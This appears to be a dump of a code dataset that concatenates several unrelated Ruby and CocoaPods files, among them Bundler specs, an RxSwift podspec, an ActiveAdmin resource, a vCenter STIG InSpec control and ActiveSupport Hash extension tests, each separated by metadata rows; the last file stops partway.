    FileUtils.mv(vendored_gems, bundled_app("vendor/bundle/#{Gem.ruby_engine}/#{new_version}"))

    bundle "install --path ./vendor/bundle"
    vendored_gems("gems/rack-1.0.0").should exist
  end
end
# Specs for the Gemfile `platforms`/`platform` DSL: gems guarded by a
# platform block (or inline :platform(s) option) are installed only when
# the current platform matches.
describe "bundle install with platform conditionals" do
  it "installs gems tagged w/ the current platforms" do
    install_gemfile <<-G
      source "file://#{gem_repo1}"

      platforms :#{local_tag} do
        gem "nokogiri"
      end
    G

    should_be_installed "nokogiri 1.4.2"
  end

  it "does not install gems tagged w/ another platforms" do
    install_gemfile <<-G
      source "file://#{gem_repo1}"

      gem "rack"
      platforms :#{not_local_tag} do
        gem "nokogiri"
      end
    G

    should_be_installed "rack 1.0"
    should_not_be_installed "nokogiri 1.4.2"
  end

  it "installs gems tagged w/ the current platforms inline" do
    install_gemfile <<-G
      source "file://#{gem_repo1}"
      gem "nokogiri", :platforms => :#{local_tag}
    G
    should_be_installed "nokogiri 1.4.2"
  end

  it "does not install gems tagged w/ another platforms inline" do
    install_gemfile <<-G
      source "file://#{gem_repo1}"
      gem "rack"
      gem "nokogiri", :platforms => :#{not_local_tag}
    G
    should_be_installed "rack 1.0"
    should_not_be_installed "nokogiri 1.4.2"
  end

  # Singular :platform spelling behaves the same as :platforms.
  it "installs gems tagged w/ the current platform inline" do
    install_gemfile <<-G
      source "file://#{gem_repo1}"
      gem "nokogiri", :platform => :#{local_tag}
    G
    should_be_installed "nokogiri 1.4.2"
  end

  it "doesn't install gems tagged w/ another platform inline" do
    install_gemfile <<-G
      source "file://#{gem_repo1}"
      gem "nokogiri", :platform => :#{not_local_tag}
    G
    should_not_be_installed "nokogiri 1.4.2"
  end

  # Regression: a git source whose every spec is platform-excluded must
  # not crash `bundle show`.
  it "does not blow up on sources with all platform-excluded specs" do
    build_git "foo"
    install_gemfile <<-G
      platform :#{not_local_tag} do
        gem "foo", :git => "#{lib_path('foo-1.0')}"
      end
    G

    bundle :show, :exitstatus => true
    exitstatus.should == 0
  end
end
| 22.481865 | 95 | 0.628255 |
ab8f0fd210665ecc6bd3921d66218b927b470975 | 1,594 | Pod::Spec.new do |s|
  s.name             = "RxSwift"
  s.version          = "5.0.2"
  s.summary          = "RxSwift is a Swift implementation of Reactive Extensions"
  s.description      = <<-DESC
This is a Swift port of [ReactiveX.io](https://github.com/ReactiveX)

Like the original [Rx](https://github.com/Reactive-extensions/Rx.Net), its intention is to enable easy composition of asynchronous operations and event streams.

It tries to port as many concepts from the original Rx as possible, but some concepts were adapted for more pleasant and performant integration with iOS/macOS/Linux environment.

Probably the best analogy for those who have never heard of Rx would be:

```
git diff | grep bug | less          # linux pipes - programs communicate by sending
                                    # sequences of bytes, words, lines, '\0' terminated strings...
```
would become if written in RxSwift
```
gitDiff().grep("bug").less          // sequences of swift objects
```
  DESC
  s.homepage         = "https://github.com/ReactiveX/RxSwift"
  s.license          = 'MIT'
  s.author           = { "Krunoslav Zaher" => "[email protected]" }
  # NOTE(review): `source` points at a fork (szfy_ios) rather than the
  # upstream ReactiveX repository named in `homepage` — confirm intended.
  s.source           = { :git => "[email protected]:szfy_ios/RxSwift.git", :tag => s.version.to_s }

  s.requires_arc     = true

  # Minimum deployment targets per Apple platform.
  s.ios.deployment_target = '8.0'
  s.osx.deployment_target = '10.9'
  s.watchos.deployment_target = '3.0'
  s.tvos.deployment_target = '9.0'

  # Platform shims live in Platform/, except those shipped inside RxSwift/.
  s.source_files = 'RxSwift/**/*.swift', 'Platform/**/*.swift'
  s.exclude_files = 'RxSwift/Platform/**/*.swift'

  s.swift_version = '5.0'
end
| 39.85 | 177 | 0.644918 |
33a85f5abde99d316e4cd5a0b165988f34c3f752 | 371 | # frozen_string_literal: true
module Nonnative
class Service
def initialize(service)
@service = service
@timeout = Nonnative::Timeout.new(service.timeout)
end
def name
service.name
end
protected
attr_reader :service, :timeout
def wait_start
sleep 0.1
end
def wait_stop
sleep 0.1
end
end
end
| 13.740741 | 56 | 0.633423 |
181beec32aeecaae9c2cae1cf219f1a4bd684550 | 1,250 | # frozen_string_literal: true
# ActiveAdmin resource registration for Author: index, filters, detail
# page, and an edit form with nested profile and posts management.
ActiveAdmin.register Author do
  # Strong-parameters whitelist, including nested attributes for the
  # profile (destroyable) and posts associations.
  permit_params :name,
                :email,
                :age,
                :avatar,
                profile_attributes: %i[id description _destroy],
                posts_attributes: %i[id title description]

  index do
    selectable_column
    id_column
    column :name
    column :email
    column :created_at
    actions
  end

  filter :name
  filter :created_at

  show do
    attributes_table do
      row :name
      row :email
      row :age
      # Show the avatar image inline when one is attached, capped to a
      # sane on-screen size.
      row :avatar do |record|
        image_tag url_for(record.avatar), style: 'max-width:800px;max-height:500px' if record.avatar.attached?
      end
      row :created_at
      row :updated_at
      row :profile
      row :posts
    end
    active_admin_comments
  end

  form do |f|
    f.inputs do
      f.input :name
      f.input :email
      f.input :age
      f.input :avatar,
              as: :file,
              hint: (object.avatar.attached? ? "Current: #{object.avatar.filename}" : nil)
    end
    f.has_many :profile, allow_destroy: true do |ff|
      ff.input :description
    end
    f.has_many :posts do |fp|
      fp.input :title
      # NOTE(review): :trumbowyg is a third-party rich-text input type —
      # requires the trumbowyg ActiveAdmin integration to be installed.
      fp.input :description, as: :trumbowyg
    end
    f.actions
  end
end
| 21.551724 | 110 | 0.5896 |
1d0921a66a59733a03260ddea844ecbe1ce25b7f | 1,463 | control 'VCSA-70-000070' do
  title 'The vCenter Server must prohibit password reuse for a minimum of five generations.'
  desc "
    Password complexity, or strength, is a measure of the effectiveness of a password in resisting attempts at guessing and brute-force attacks.

    To meet password policy requirements, passwords need to be changed at specific policy-based intervals.

    If the information system or application allows the user to consecutively reuse their password when that password has exceeded its defined lifetime, the end result is a password that is not changed as per policy requirements.
  "
  desc 'rationale', ''
  desc 'check', "
    From the vSphere Client, go to Administration >> Single Sign On >> Configuration >> Local Accounts >> Password Policy.

    View the value of the \"Restrict reuse\" setting.

    If the \"Restrict reuse\" policy is not set to \"5\" or more, this is a finding.
  "
  desc 'fix', "
    From the vSphere Client, go to Administration >> Single Sign On >> Configuration >> Local Accounts >> Password Policy.

    Click \"Edit\" and enter \"5\" into the \"Restrict reuse\" setting and click \"OK\".
  "
  impact 0.5
  tag severity: 'medium'
  tag gtitle: 'SRG-APP-000165'
  tag gid: nil
  tag rid: nil
  tag stig_id: 'VCSA-70-000070'
  tag cci: ['CCI-000200']
  tag nist: ['IA-5 (1) (e)']

  # This setting is only visible in the vSphere Client UI, so the control
  # is recorded as a skipped/manual check rather than automated.
  describe 'This check is a manual or policy based check' do
    skip 'This must be reviewed manually'
  end
end
| 40.638889 | 229 | 0.710868 |
085779603658f44f0ba8942c7710664c22582334 | 53,172 | require 'abstract_unit'
require 'active_support/core_ext/hash'
require 'bigdecimal'
require 'active_support/core_ext/string/access'
require 'active_support/ordered_hash'
require 'active_support/core_ext/object/conversions'
require 'active_support/core_ext/object/deep_dup'
require 'active_support/inflections'
class HashExtTest < ActiveSupport::TestCase
class IndifferentHash < ActiveSupport::HashWithIndifferentAccess
end
class SubclassingArray < Array
end
class SubclassingHash < Hash
end
class NonIndifferentHash < Hash
def nested_under_indifferent_access
self
end
end
def setup
@strings = { 'a' => 1, 'b' => 2 }
@nested_strings = { 'a' => { 'b' => { 'c' => 3 } } }
@symbols = { :a => 1, :b => 2 }
@nested_symbols = { :a => { :b => { :c => 3 } } }
@mixed = { :a => 1, 'b' => 2 }
@nested_mixed = { 'a' => { :b => { 'c' => 3 } } }
@fixnums = { 0 => 1, 1 => 2 }
@nested_fixnums = { 0 => { 1 => { 2 => 3} } }
@illegal_symbols = { [] => 3 }
@nested_illegal_symbols = { [] => { [] => 3} }
@upcase_strings = { 'A' => 1, 'B' => 2 }
@nested_upcase_strings = { 'A' => { 'B' => { 'C' => 3 } } }
end
def test_methods
h = {}
assert_respond_to h, :transform_keys
assert_respond_to h, :transform_keys!
assert_respond_to h, :deep_transform_keys
assert_respond_to h, :deep_transform_keys!
assert_respond_to h, :symbolize_keys
assert_respond_to h, :symbolize_keys!
assert_respond_to h, :deep_symbolize_keys
assert_respond_to h, :deep_symbolize_keys!
assert_respond_to h, :stringify_keys
assert_respond_to h, :stringify_keys!
assert_respond_to h, :deep_stringify_keys
assert_respond_to h, :deep_stringify_keys!
assert_respond_to h, :to_options
assert_respond_to h, :to_options!
end
def test_transform_keys
assert_equal @upcase_strings, @strings.transform_keys{ |key| key.to_s.upcase }
assert_equal @upcase_strings, @symbols.transform_keys{ |key| key.to_s.upcase }
assert_equal @upcase_strings, @mixed.transform_keys{ |key| key.to_s.upcase }
end
def test_transform_keys_not_mutates
transformed_hash = @mixed.dup
transformed_hash.transform_keys{ |key| key.to_s.upcase }
assert_equal @mixed, transformed_hash
end
def test_deep_transform_keys
assert_equal @nested_upcase_strings, @nested_symbols.deep_transform_keys{ |key| key.to_s.upcase }
assert_equal @nested_upcase_strings, @nested_strings.deep_transform_keys{ |key| key.to_s.upcase }
assert_equal @nested_upcase_strings, @nested_mixed.deep_transform_keys{ |key| key.to_s.upcase }
end
def test_deep_transform_keys_not_mutates
transformed_hash = @nested_mixed.deep_dup
transformed_hash.deep_transform_keys{ |key| key.to_s.upcase }
assert_equal @nested_mixed, transformed_hash
end
def test_transform_keys!
assert_equal @upcase_strings, @symbols.dup.transform_keys!{ |key| key.to_s.upcase }
assert_equal @upcase_strings, @strings.dup.transform_keys!{ |key| key.to_s.upcase }
assert_equal @upcase_strings, @mixed.dup.transform_keys!{ |key| key.to_s.upcase }
end
def test_transform_keys_with_bang_mutates
transformed_hash = @mixed.dup
transformed_hash.transform_keys!{ |key| key.to_s.upcase }
assert_equal @upcase_strings, transformed_hash
assert_equal @mixed, { :a => 1, "b" => 2 }
end
def test_deep_transform_keys!
assert_equal @nested_upcase_strings, @nested_symbols.deep_dup.deep_transform_keys!{ |key| key.to_s.upcase }
assert_equal @nested_upcase_strings, @nested_strings.deep_dup.deep_transform_keys!{ |key| key.to_s.upcase }
assert_equal @nested_upcase_strings, @nested_mixed.deep_dup.deep_transform_keys!{ |key| key.to_s.upcase }
end
def test_deep_transform_keys_with_bang_mutates
transformed_hash = @nested_mixed.deep_dup
transformed_hash.deep_transform_keys!{ |key| key.to_s.upcase }
assert_equal @nested_upcase_strings, transformed_hash
assert_equal @nested_mixed, { 'a' => { :b => { 'c' => 3 } } }
end
def test_symbolize_keys
assert_equal @symbols, @symbols.symbolize_keys
assert_equal @symbols, @strings.symbolize_keys
assert_equal @symbols, @mixed.symbolize_keys
end
def test_symbolize_keys_not_mutates
transformed_hash = @mixed.dup
transformed_hash.symbolize_keys
assert_equal @mixed, transformed_hash
end
def test_deep_symbolize_keys
assert_equal @nested_symbols, @nested_symbols.deep_symbolize_keys
assert_equal @nested_symbols, @nested_strings.deep_symbolize_keys
assert_equal @nested_symbols, @nested_mixed.deep_symbolize_keys
end
def test_deep_symbolize_keys_not_mutates
transformed_hash = @nested_mixed.deep_dup
transformed_hash.deep_symbolize_keys
assert_equal @nested_mixed, transformed_hash
end
def test_symbolize_keys!
assert_equal @symbols, @symbols.dup.symbolize_keys!
assert_equal @symbols, @strings.dup.symbolize_keys!
assert_equal @symbols, @mixed.dup.symbolize_keys!
end
def test_symbolize_keys_with_bang_mutates
transformed_hash = @mixed.dup
transformed_hash.deep_symbolize_keys!
assert_equal @symbols, transformed_hash
assert_equal @mixed, { :a => 1, "b" => 2 }
end
def test_deep_symbolize_keys!
assert_equal @nested_symbols, @nested_symbols.deep_dup.deep_symbolize_keys!
assert_equal @nested_symbols, @nested_strings.deep_dup.deep_symbolize_keys!
assert_equal @nested_symbols, @nested_mixed.deep_dup.deep_symbolize_keys!
end
def test_deep_symbolize_keys_with_bang_mutates
transformed_hash = @nested_mixed.deep_dup
transformed_hash.deep_symbolize_keys!
assert_equal @nested_symbols, transformed_hash
assert_equal @nested_mixed, { 'a' => { :b => { 'c' => 3 } } }
end
def test_symbolize_keys_preserves_keys_that_cant_be_symbolized
assert_equal @illegal_symbols, @illegal_symbols.symbolize_keys
assert_equal @illegal_symbols, @illegal_symbols.dup.symbolize_keys!
end
def test_deep_symbolize_keys_preserves_keys_that_cant_be_symbolized
assert_equal @nested_illegal_symbols, @nested_illegal_symbols.deep_symbolize_keys
assert_equal @nested_illegal_symbols, @nested_illegal_symbols.deep_dup.deep_symbolize_keys!
end
def test_symbolize_keys_preserves_fixnum_keys
assert_equal @fixnums, @fixnums.symbolize_keys
assert_equal @fixnums, @fixnums.dup.symbolize_keys!
end
def test_deep_symbolize_keys_preserves_fixnum_keys
assert_equal @nested_fixnums, @nested_fixnums.deep_symbolize_keys
assert_equal @nested_fixnums, @nested_fixnums.deep_dup.deep_symbolize_keys!
end
def test_stringify_keys
assert_equal @strings, @symbols.stringify_keys
assert_equal @strings, @strings.stringify_keys
assert_equal @strings, @mixed.stringify_keys
end
def test_stringify_keys_not_mutates
transformed_hash = @mixed.dup
transformed_hash.stringify_keys
assert_equal @mixed, transformed_hash
end
def test_deep_stringify_keys
assert_equal @nested_strings, @nested_symbols.deep_stringify_keys
assert_equal @nested_strings, @nested_strings.deep_stringify_keys
assert_equal @nested_strings, @nested_mixed.deep_stringify_keys
end
def test_deep_stringify_keys_not_mutates
transformed_hash = @nested_mixed.deep_dup
transformed_hash.deep_stringify_keys
assert_equal @nested_mixed, transformed_hash
end
def test_stringify_keys!
assert_equal @strings, @symbols.dup.stringify_keys!
assert_equal @strings, @strings.dup.stringify_keys!
assert_equal @strings, @mixed.dup.stringify_keys!
end
def test_stringify_keys_with_bang_mutates
transformed_hash = @mixed.dup
transformed_hash.stringify_keys!
assert_equal @strings, transformed_hash
assert_equal @mixed, { :a => 1, "b" => 2 }
end
def test_deep_stringify_keys!
assert_equal @nested_strings, @nested_symbols.deep_dup.deep_stringify_keys!
assert_equal @nested_strings, @nested_strings.deep_dup.deep_stringify_keys!
assert_equal @nested_strings, @nested_mixed.deep_dup.deep_stringify_keys!
end
def test_deep_stringify_keys_with_bang_mutates
transformed_hash = @nested_mixed.deep_dup
transformed_hash.deep_stringify_keys!
assert_equal @nested_strings, transformed_hash
assert_equal @nested_mixed, { 'a' => { :b => { 'c' => 3 } } }
end
def test_symbolize_keys_for_hash_with_indifferent_access
assert_instance_of Hash, @symbols.with_indifferent_access.symbolize_keys
assert_equal @symbols, @symbols.with_indifferent_access.symbolize_keys
assert_equal @symbols, @strings.with_indifferent_access.symbolize_keys
assert_equal @symbols, @mixed.with_indifferent_access.symbolize_keys
end
def test_deep_symbolize_keys_for_hash_with_indifferent_access
assert_instance_of Hash, @nested_symbols.with_indifferent_access.deep_symbolize_keys
assert_equal @nested_symbols, @nested_symbols.with_indifferent_access.deep_symbolize_keys
assert_equal @nested_symbols, @nested_strings.with_indifferent_access.deep_symbolize_keys
assert_equal @nested_symbols, @nested_mixed.with_indifferent_access.deep_symbolize_keys
end
def test_symbolize_keys_bang_for_hash_with_indifferent_access
assert_raise(NoMethodError) { @symbols.with_indifferent_access.dup.symbolize_keys! }
assert_raise(NoMethodError) { @strings.with_indifferent_access.dup.symbolize_keys! }
assert_raise(NoMethodError) { @mixed.with_indifferent_access.dup.symbolize_keys! }
end
def test_deep_symbolize_keys_bang_for_hash_with_indifferent_access
assert_raise(NoMethodError) { @nested_symbols.with_indifferent_access.deep_dup.deep_symbolize_keys! }
assert_raise(NoMethodError) { @nested_strings.with_indifferent_access.deep_dup.deep_symbolize_keys! }
assert_raise(NoMethodError) { @nested_mixed.with_indifferent_access.deep_dup.deep_symbolize_keys! }
end
def test_symbolize_keys_preserves_keys_that_cant_be_symbolized_for_hash_with_indifferent_access
assert_equal @illegal_symbols, @illegal_symbols.with_indifferent_access.symbolize_keys
assert_raise(NoMethodError) { @illegal_symbols.with_indifferent_access.dup.symbolize_keys! }
end
def test_deep_symbolize_keys_preserves_keys_that_cant_be_symbolized_for_hash_with_indifferent_access
assert_equal @nested_illegal_symbols, @nested_illegal_symbols.with_indifferent_access.deep_symbolize_keys
assert_raise(NoMethodError) { @nested_illegal_symbols.with_indifferent_access.deep_dup.deep_symbolize_keys! }
end
def test_symbolize_keys_preserves_fixnum_keys_for_hash_with_indifferent_access
assert_equal @fixnums, @fixnums.with_indifferent_access.symbolize_keys
assert_raise(NoMethodError) { @fixnums.with_indifferent_access.dup.symbolize_keys! }
end
def test_deep_symbolize_keys_preserves_fixnum_keys_for_hash_with_indifferent_access
assert_equal @nested_fixnums, @nested_fixnums.with_indifferent_access.deep_symbolize_keys
assert_raise(NoMethodError) { @nested_fixnums.with_indifferent_access.deep_dup.deep_symbolize_keys! }
end
def test_stringify_keys_for_hash_with_indifferent_access
assert_instance_of ActiveSupport::HashWithIndifferentAccess, @symbols.with_indifferent_access.stringify_keys
assert_equal @strings, @symbols.with_indifferent_access.stringify_keys
assert_equal @strings, @strings.with_indifferent_access.stringify_keys
assert_equal @strings, @mixed.with_indifferent_access.stringify_keys
end
def test_deep_stringify_keys_for_hash_with_indifferent_access
assert_instance_of ActiveSupport::HashWithIndifferentAccess, @nested_symbols.with_indifferent_access.deep_stringify_keys
assert_equal @nested_strings, @nested_symbols.with_indifferent_access.deep_stringify_keys
assert_equal @nested_strings, @nested_strings.with_indifferent_access.deep_stringify_keys
assert_equal @nested_strings, @nested_mixed.with_indifferent_access.deep_stringify_keys
end
def test_stringify_keys_bang_for_hash_with_indifferent_access
assert_instance_of ActiveSupport::HashWithIndifferentAccess, @symbols.with_indifferent_access.dup.stringify_keys!
assert_equal @strings, @symbols.with_indifferent_access.dup.stringify_keys!
assert_equal @strings, @strings.with_indifferent_access.dup.stringify_keys!
assert_equal @strings, @mixed.with_indifferent_access.dup.stringify_keys!
end
def test_deep_stringify_keys_bang_for_hash_with_indifferent_access
assert_instance_of ActiveSupport::HashWithIndifferentAccess, @nested_symbols.with_indifferent_access.dup.deep_stringify_keys!
assert_equal @nested_strings, @nested_symbols.with_indifferent_access.deep_dup.deep_stringify_keys!
assert_equal @nested_strings, @nested_strings.with_indifferent_access.deep_dup.deep_stringify_keys!
assert_equal @nested_strings, @nested_mixed.with_indifferent_access.deep_dup.deep_stringify_keys!
end
def test_nested_under_indifferent_access
foo = { "foo" => SubclassingHash.new.tap { |h| h["bar"] = "baz" } }.with_indifferent_access
assert_kind_of ActiveSupport::HashWithIndifferentAccess, foo["foo"]
foo = { "foo" => NonIndifferentHash.new.tap { |h| h["bar"] = "baz" } }.with_indifferent_access
assert_kind_of NonIndifferentHash, foo["foo"]
foo = { "foo" => IndifferentHash.new.tap { |h| h["bar"] = "baz" } }.with_indifferent_access
assert_kind_of IndifferentHash, foo["foo"]
end
def test_indifferent_assorted
@strings = @strings.with_indifferent_access
@symbols = @symbols.with_indifferent_access
@mixed = @mixed.with_indifferent_access
assert_equal 'a', @strings.__send__(:convert_key, :a)
assert_equal 1, @strings.fetch('a')
assert_equal 1, @strings.fetch(:a.to_s)
assert_equal 1, @strings.fetch(:a)
hashes = { :@strings => @strings, :@symbols => @symbols, :@mixed => @mixed }
method_map = { :'[]' => 1, :fetch => 1, :values_at => [1],
:has_key? => true, :include? => true, :key? => true,
:member? => true }
hashes.each do |name, hash|
method_map.sort_by { |m| m.to_s }.each do |meth, expected|
assert_equal(expected, hash.__send__(meth, 'a'),
"Calling #{name}.#{meth} 'a'")
assert_equal(expected, hash.__send__(meth, :a),
"Calling #{name}.#{meth} :a")
end
end
assert_equal [1, 2], @strings.values_at('a', 'b')
assert_equal [1, 2], @strings.values_at(:a, :b)
assert_equal [1, 2], @symbols.values_at('a', 'b')
assert_equal [1, 2], @symbols.values_at(:a, :b)
assert_equal [1, 2], @mixed.values_at('a', 'b')
assert_equal [1, 2], @mixed.values_at(:a, :b)
end
def test_indifferent_reading
hash = HashWithIndifferentAccess.new
hash["a"] = 1
hash["b"] = true
hash["c"] = false
hash["d"] = nil
assert_equal 1, hash[:a]
assert_equal true, hash[:b]
assert_equal false, hash[:c]
assert_equal nil, hash[:d]
assert_equal nil, hash[:e]
end
def test_indifferent_reading_with_nonnil_default
hash = HashWithIndifferentAccess.new(1)
hash["a"] = 1
hash["b"] = true
hash["c"] = false
hash["d"] = nil
assert_equal 1, hash[:a]
assert_equal true, hash[:b]
assert_equal false, hash[:c]
assert_equal nil, hash[:d]
assert_equal 1, hash[:e]
end
def test_indifferent_writing
hash = HashWithIndifferentAccess.new
hash[:a] = 1
hash['b'] = 2
hash[3] = 3
assert_equal hash['a'], 1
assert_equal hash['b'], 2
assert_equal hash[:a], 1
assert_equal hash[:b], 2
assert_equal hash[3], 3
end
# update must overwrite existing entries indifferently whether the
# incoming hash is string-keyed, symbol-keyed, or mixed, and must not
# duplicate keys that differ only in string/symbol form.
def test_indifferent_update
hash = HashWithIndifferentAccess.new
hash[:a] = 'a'
hash['b'] = 'b'
updated_with_strings = hash.update(@strings)
updated_with_symbols = hash.update(@symbols)
updated_with_mixed = hash.update(@mixed)
# assert_equal takes (expected, actual) — the original had the
# arguments reversed throughout this method.
assert_equal 1, updated_with_strings[:a]
assert_equal 1, updated_with_strings['a']
assert_equal 2, updated_with_strings['b']
assert_equal 1, updated_with_symbols[:a]
assert_equal 2, updated_with_symbols['b']
assert_equal 2, updated_with_symbols[:b]
assert_equal 1, updated_with_mixed[:a]
assert_equal 2, updated_with_mixed['b']
assert [updated_with_strings, updated_with_symbols, updated_with_mixed].all? { |h| h.keys.size == 2 }
end
# merge must return a new HashWithIndifferentAccess whose entries win
# over the receiver's; update must do the same in place.
def test_indifferent_merging
hash = HashWithIndifferentAccess.new
hash[:a] = 'failure'
hash['b'] = 'failure'
other = { 'a' => 1, :b => 2 }
merged = hash.merge(other)
assert_equal HashWithIndifferentAccess, merged.class
assert_equal 1, merged[:a]
assert_equal 2, merged['b']
hash.update(other)
assert_equal 1, hash[:a]
assert_equal 2, hash['b']
end
# replace must swap the contents wholesale (old keys gone, new keys
# indifferent) and return the receiver itself.
def test_indifferent_replace
hash = HashWithIndifferentAccess.new
hash[:a] = 42
replaced = hash.replace(b: 12)
assert hash.key?('b')
assert !hash.key?(:a)
assert_equal 12, hash[:b]
assert_same hash, replaced
end
# merge with a conflict-resolution block must invoke the block only for
# keys present on both sides (indifferently matched) and keep the
# block's return value.
def test_indifferent_merging_with_block
hash = HashWithIndifferentAccess.new
hash[:a] = 1
hash['b'] = 3
other = { 'a' => 4, :b => 2, 'c' => 10 }
merged = hash.merge(other) { |key, old, new| old > new ? old : new }
assert_equal HashWithIndifferentAccess, merged.class
assert_equal 4, merged[:a]
assert_equal 3, merged['b']
assert_equal 10, merged[:c]
# Merging another indifferent hash must behave the same way.
other_indifferent = HashWithIndifferentAccess.new('a' => 9, :b => 2)
merged = hash.merge(other_indifferent) { |key, old, new| old + new }
assert_equal HashWithIndifferentAccess, merged.class
assert_equal 10, merged[:a]
assert_equal 5, merged[:b]
end
# reverse_merge! must keep existing entries ("noclobber" loses) and add
# only the keys that were missing.
def test_indifferent_reverse_merging
hash = HashWithIndifferentAccess.new('some' => 'value', 'other' => 'value')
hash.reverse_merge!(:some => 'noclobber', :another => 'clobber')
assert_equal 'value', hash[:some]
assert_equal 'clobber', hash[:another]
end
# delete must work with either key form; a second delete of the same
# key must return nil.
def test_indifferent_deleting
get_hash = proc { { :a => 'foo' }.with_indifferent_access }
hash = get_hash.call
# (expected, actual) order fixed, and assert_nil used instead of the
# deprecated `assert_equal ..., nil`.
assert_equal 'foo', hash.delete(:a)
assert_nil hash.delete(:a)
hash = get_hash.call
assert_equal 'foo', hash.delete('a')
assert_nil hash.delete('a')
end
# select / select! / reject / reject! must preserve the
# HashWithIndifferentAccess class of the result.
def test_indifferent_select
hash = ActiveSupport::HashWithIndifferentAccess.new(@strings).select {|k,v| v == 1}
assert_equal({ 'a' => 1 }, hash)
assert_instance_of ActiveSupport::HashWithIndifferentAccess, hash
end
def test_indifferent_select_bang
indifferent_strings = ActiveSupport::HashWithIndifferentAccess.new(@strings)
indifferent_strings.select! {|k,v| v == 1}
assert_equal({ 'a' => 1 }, indifferent_strings)
assert_instance_of ActiveSupport::HashWithIndifferentAccess, indifferent_strings
end
def test_indifferent_reject
hash = ActiveSupport::HashWithIndifferentAccess.new(@strings).reject {|k,v| v != 1}
assert_equal({ 'a' => 1 }, hash)
assert_instance_of ActiveSupport::HashWithIndifferentAccess, hash
end
def test_indifferent_reject_bang
indifferent_strings = ActiveSupport::HashWithIndifferentAccess.new(@strings)
indifferent_strings.reject! {|k,v| v != 1}
assert_equal({ 'a' => 1 }, indifferent_strings)
assert_instance_of ActiveSupport::HashWithIndifferentAccess, indifferent_strings
end
# to_hash must return a plain Hash (string keys, default preserved) and
# must convert nested indifferent hashes back to plain hashes too.
def test_indifferent_to_hash
# Should convert to a Hash with String keys.
assert_equal @strings, @mixed.with_indifferent_access.to_hash
# Should preserve the default value.
mixed_with_default = @mixed.dup
mixed_with_default.default = '1234'
roundtrip = mixed_with_default.with_indifferent_access.to_hash
assert_equal @strings, roundtrip
assert_equal '1234', roundtrip.default
new_to_hash = @nested_mixed.with_indifferent_access.to_hash
assert_not new_to_hash.instance_of?(HashWithIndifferentAccess)
assert_not new_to_hash["a"].instance_of?(HashWithIndifferentAccess)
assert_not new_to_hash["a"]["b"].instance_of?(HashWithIndifferentAccess)
end
# A default-proc that stores into the hash must return the same stored
# object on subsequent lookups (so << mutates the stored array).
def test_lookup_returns_the_same_object_that_is_stored_in_hash_indifferent_access
hash = HashWithIndifferentAccess.new {|h, k| h[k] = []}
hash[:a] << 1
assert_equal [1], hash[:a]
end
# with_indifferent_access must not mutate the original hash or the
# hashes nested inside it.
def test_with_indifferent_access_has_no_side_effects_on_existing_hash
hash = {content: [{:foo => :bar, 'bar' => 'baz'}]}
hash.with_indifferent_access
assert_equal [:foo, "bar"], hash[:content].first.keys
end
# Hashes inside arrays must be converted on read and converted back by
# to_hash.
def test_indifferent_hash_with_array_of_hashes
hash = { "urls" => { "url" => [ { "address" => "1" }, { "address" => "2" } ] }}.with_indifferent_access
assert_equal "1", hash[:urls][:url].first[:address]
hash = hash.to_hash
assert_not hash.instance_of?(HashWithIndifferentAccess)
assert_not hash["urls"].instance_of?(HashWithIndifferentAccess)
assert_not hash["urls"]["url"].first.instance_of?(HashWithIndifferentAccess)
end
# Array subclasses used as values must keep their class after
# conversion — even when frozen.
def test_should_preserve_array_subclass_when_value_is_array
array = SubclassingArray.new
array << { "address" => "1" }
hash = { "urls" => { "url" => array }}.with_indifferent_access
assert_equal SubclassingArray, hash[:urls][:url].class
end
def test_should_preserve_array_class_when_hash_value_is_frozen_array
array = SubclassingArray.new
array << { "address" => "1" }
hash = { "urls" => { "url" => array.freeze }}.with_indifferent_access
assert_equal SubclassingArray, hash[:urls][:url].class
end
# Key-conversion helpers must be lossless round-trips on an
# indifferent hash (shallow variants).
def test_stringify_and_symbolize_keys_on_indifferent_preserves_hash
h = HashWithIndifferentAccess.new
h[:first] = 1
h = h.stringify_keys
assert_equal 1, h['first']
h = HashWithIndifferentAccess.new
h['first'] = 1
h = h.symbolize_keys
assert_equal 1, h[:first]
end
# Same as above for the deep variants.
def test_deep_stringify_and_deep_symbolize_keys_on_indifferent_preserves_hash
h = HashWithIndifferentAccess.new
h[:first] = 1
h = h.deep_stringify_keys
assert_equal 1, h['first']
h = HashWithIndifferentAccess.new
h['first'] = 1
h = h.deep_symbolize_keys
assert_equal 1, h[:first]
end
# to_options! (alias of symbolize_keys!) must leave values reachable.
def test_to_options_on_indifferent_preserves_hash
h = HashWithIndifferentAccess.new
h['first'] = 1
h.to_options!
assert_equal 1, h['first']
end
# Nested hashes must be indifferent at every level.
def test_indifferent_subhashes
h = {'user' => {'id' => 5}}.with_indifferent_access
['user', :user].each {|user| [:id, 'id'].each {|id| assert_equal 5, h[user][id], "h[#{user.inspect}][#{id.inspect}] should be 5"}}
h = {:user => {:id => 5}}.with_indifferent_access
['user', :user].each {|user| [:id, 'id'].each {|id| assert_equal 5, h[user][id], "h[#{user.inspect}][#{id.inspect}] should be 5"}}
end
# dup must carry over the default value and the concrete subclass.
def test_indifferent_duplication
# Should preserve default value
h = HashWithIndifferentAccess.new
h.default = '1234'
assert_equal h.default, h.dup.default
# Should preserve class for subclasses
h = IndifferentHash.new
assert_equal h.class, h.dup.class
end
def test_assert_valid_keys
assert_nothing_raised do
{ :failure => "stuff", :funny => "business" }.assert_valid_keys([ :failure, :funny ])
{ :failure => "stuff", :funny => "business" }.assert_valid_keys(:failure, :funny)
end
assert_raise(ArgumentError, "Unknown key: failore") do
# NOTE(review): the second call below is unreachable — the first call
# raises and exits the block. Probably intended as two separate
# assert_raise blocks.
{ :failore => "stuff", :funny => "business" }.assert_valid_keys([ :failure, :funny ])
{ :failore => "stuff", :funny => "business" }.assert_valid_keys(:failure, :funny)
end
end
# Keys that are neither strings nor symbols must be left untouched by
# with_indifferent_access.
def test_assorted_keys_not_stringified
original = {Object.new => 2, 1 => 2, [] => true}
indiff = original.with_indifferent_access
assert(!indiff.keys.any? {|k| k.kind_of? String}, "A key was converted to a string!")
end
# deep_merge must recurse into nested hashes, with the argument winning
# on scalar conflicts; deep_merge! must do the same in place.
def test_deep_merge
hash_1 = { :a => "a", :b => "b", :c => { :c1 => "c1", :c2 => "c2", :c3 => { :d1 => "d1" } } }
hash_2 = { :a => 1, :c => { :c1 => 2, :c3 => { :d2 => "d2" } } }
expected = { :a => 1, :b => "b", :c => { :c1 => 2, :c2 => "c2", :c3 => { :d1 => "d1", :d2 => "d2" } } }
assert_equal expected, hash_1.deep_merge(hash_2)
hash_1.deep_merge!(hash_2)
assert_equal expected, hash_1
end
# The conflict block must receive (key, old, new) at every depth where
